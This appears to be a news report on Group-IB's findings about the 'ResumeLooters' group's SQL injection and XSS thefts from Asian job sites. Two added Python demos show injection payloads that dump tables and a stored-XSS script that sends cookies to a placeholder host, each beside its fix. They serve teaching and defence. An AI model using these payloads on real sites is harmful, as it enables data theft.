Singapore-based infosec firm Group-IB has detected a group that spent the last two months of 2023 stealing personal information from job board and retailer websites across Asia.
The actors, dubbed “ResumeLooters” by Group-IB, used SQL injection and cross-site scripting (XSS) attacks against the sites and made off with their databases. The haul included over two million email addresses, plus names, phone numbers, dates of birth, and employment history.
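The SQL injection technique the article describes, as an added example rather than Group-IB's or the attackers' code: a constructed sqlite3 "candidates" lookup in which concatenating the email parameter into the query lets one input dump every row, and a UNION payload reaches a separate staff table, beside the parameterized query that stops both. The table and column names, rows, and payloads are all assumptions made up for illustration.

```python
import sqlite3

# Constructed sample data standing in for a job board's database: a candidates
# table (the kind of personal data the article says was taken) and a staff table
# an attacker would want to reach for admin credentials. None of this is real.
CANDIDATES = [
    ("alice@example.com", "Alice", "+65-0000-0001", "1990-01-01"),
    ("bob@example.com", "Bob", "+66-0000-0002", "1985-05-05"),
    ("carol@example.com", "Carol", "+84-0000-0003", "1992-09-09"),
]
STAFF = [("admin", "$2b$12$constructedhash", "superuser")]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE candidates (email TEXT, name TEXT, phone TEXT, dob TEXT)")
    conn.execute("CREATE TABLE staff (username TEXT, password_hash TEXT, role TEXT)")
    conn.executemany("INSERT INTO candidates VALUES (?, ?, ?, ?)", CANDIDATES)
    conn.executemany("INSERT INTO staff VALUES (?, ?, ?)", STAFF)
    return conn


def lookup_vulnerable(conn, email):
    # Untrusted input is pasted straight into the SQL text, so a quote in the
    # input ends the string literal and the rest is parsed as SQL.
    query = f"SELECT email, name, phone, dob FROM candidates WHERE email = '{email}'"
    return conn.execute(query).fetchall()


def lookup_parameterized(conn, email):
    # The driver sends the value separately from the query text; the input can
    # never change the statement's structure, whatever characters it contains.
    return conn.execute(
        "SELECT email, name, phone, dob FROM candidates WHERE email = ?", (email,)
    ).fetchall()


# Two constructed payloads: the first turns the WHERE clause into a tautology and
# dumps every candidate; the second uses UNION to pull rows from a different
# table, with "--" commenting out the closing quote the application appends.
DUMP_ALL = "' OR '1'='1"
DUMP_STAFF = "' UNION SELECT username, password_hash, role, '' FROM staff--"


def demo():
    conn = make_db()
    return {
        "vulnerable_dump_all": lookup_vulnerable(conn, DUMP_ALL),
        "vulnerable_dump_staff": lookup_vulnerable(conn, DUMP_STAFF),
        "parameterized_dump_all": lookup_parameterized(conn, DUMP_ALL),
        "parameterized_dump_staff": lookup_parameterized(conn, DUMP_STAFF),
        "parameterized_normal": lookup_parameterized(conn, "alice@example.com"),
    }


if __name__ == "__main__":
    for label, rows in demo().items():
        print(f"{label}: {len(rows)} row(s)")
        for row in rows:
            print("   ", row)
```

The UNION payload is the shape that turns a single-row lookup into a cross-table dump, which is how one injectable parameter yields an entire user database; the parameterized version returns nothing for both payloads because they are compared as literal email strings.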
“The initial victims that we identified were mainly job search websites. Additionally, the group focuses on selling data stolen from recruiting agencies,” Nikita Rostovcev, a senior analyst from the cyber security firm, told The Reg.
Rostovcev declined to name the retailers hit by the looters, but confirmed that they included “e-commerce companies of various sizes, including some that are quite popular in their respective markets.”
While SQL injection was the gang’s main tool, XSS was used against four legitimate job search websites. The threat actors created fake candidate profiles whose fields carried malicious scripts, so that the script ran in the browser of anyone who viewed the profile page (a stored XSS attack), letting the attacker steal information, manipulate content, or perform other malicious actions. Group-IB believes the main goal was to steal admin credentials, but found no evidence the gang succeeded with that effort.
“The presence of this code on these pages does not necessarily imply that it was executed on every device. However, it does indicate the persistence of the attackers and their attempts to inject their XSS scripts into all possible input fields on the targeted websites. Group-IB has also found evidence that the XSS script was executed on some of the visitors’ devices,” noted Group-IB’s infosec analysts.
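The fake-profile stored XSS described above, as an added example that is not the campaign's code or Group-IB's: a constructed profile renderer in Python that interpolates candidate fields straight into HTML, the same renderer with context-appropriate escaping, and a parser-based check for whether the resulting page carries a script tag or inline event handler. The profile values, field names, and collector hostname are made up.

```python
import html
from html.parser import HTMLParser

# Constructed attacker profile: the "name" field carries a script and the
# "headline" field tries to break out of an HTML attribute. This is an
# illustration, not a payload taken from the campaign.
ATTACKER_PROFILE = {
    "name": 'Jane Doe<script>fetch("https://collector.invalid/?c="+document.cookie)</script>',
    "headline": '" onmouseover="alert(1)',
    "email": "jane@example.com",
}
BENIGN_PROFILE = {"name": "Ann Lee", "headline": "Backend developer", "email": "ann@example.com"}


def render_vulnerable(profile):
    # Profile fields are interpolated verbatim into HTML, so whatever the
    # candidate typed into the sign-up form becomes markup in the recruiter's
    # or admin's browser: stored XSS.
    return (
        f'<div class="candidate" title="{profile["headline"]}">'
        f'<h2>{profile["name"]}</h2><p>{profile["email"]}</p></div>'
    )


def esc(value):
    # html.escape(quote=True) encodes <, >, & and both quote characters, which
    # is what makes the attribute context safe as well as the text context.
    return html.escape(value, quote=True)


def render_hardened(profile):
    # Same template, every untrusted value escaped for where it lands.
    return (
        f'<div class="candidate" title="{esc(profile["headline"])}">'
        f'<h2>{esc(profile["name"])}</h2><p>{esc(profile["email"])}</p></div>'
    )


class ActiveContentFinder(HTMLParser):
    # Walks the rendered markup the way a browser would tokenize it and records
    # script elements and on* attributes. A parser is used rather than a regex
    # because the escaped output still contains the text "onmouseover=" inside
    # an attribute value, where it is harmless.
    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.findings.append("script tag")
        for name, _ in attrs:
            if name.startswith("on"):
                self.findings.append(f"event handler {name}")


def active_content(rendered_html):
    # Test oracle for the two renderers: what executable content reached the page?
    finder = ActiveContentFinder()
    finder.feed(rendered_html)
    return finder.findings


if __name__ == "__main__":
    for label, renderer in (("vulnerable", render_vulnerable), ("hardened", render_hardened)):
        page = renderer(ATTACKER_PROFILE)
        print(f"{label}: {active_content(page) or 'no active content'}")
        print("   ", page)
```

Output encoding is the fix that matters here; the parser-based check is the kind of assertion a job board could keep in its test suite so a profile field can never again reach an admin page as live markup.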
Although all compromised websites were found at the end of 2023, Group-IB believes the attacks began as early as January of the same year.
Some 70 percent of victims were in the APAC region, with the remainder elsewhere. The largest number of hacked websites came from India (12), with Taiwan (10), Thailand (9) and Vietnam (7) following close behind.
Group-IB identified a malicious server that contained the logs of multiple penetration testing tools. The group favored readily available tooling, much of it open source, such as sqlmap, Acunetix, the BeEF framework, X-Ray, Metasploit, ARL, and Dirsearch.
Commands on the server led Group-IB to believe that the threat actors were attempting to gain shell access on target systems, so as to download and execute additional payloads and hunt for further data while in control of a victim’s server. However, it is unknown whether ResumeLooters succeeded.
The threat actor’s server contained an open directory in which the crims stored stolen source code pages, cookies and notes about victims. They failed to disable its directory listing, however, which led to its discovery.
Group-IB traced the email address employed by ResumeLooters in their campaign to two different Chinese-language Telegram accounts, one of which listed the stolen data for sale. One account was named “渗透数据中心,” which translates to “Penetration Data Center” in simplified Chinese. The other was called “万国数据阿力” which translates to “World Data Ali.”
The Reg was told that many of the comments in the code were made in Chinese – supporting an assumption the attackers hail from the Middle Kingdom.
Rostovcev commented that it is believed the threat actors targeted their home region, as it is more familiar to them. ®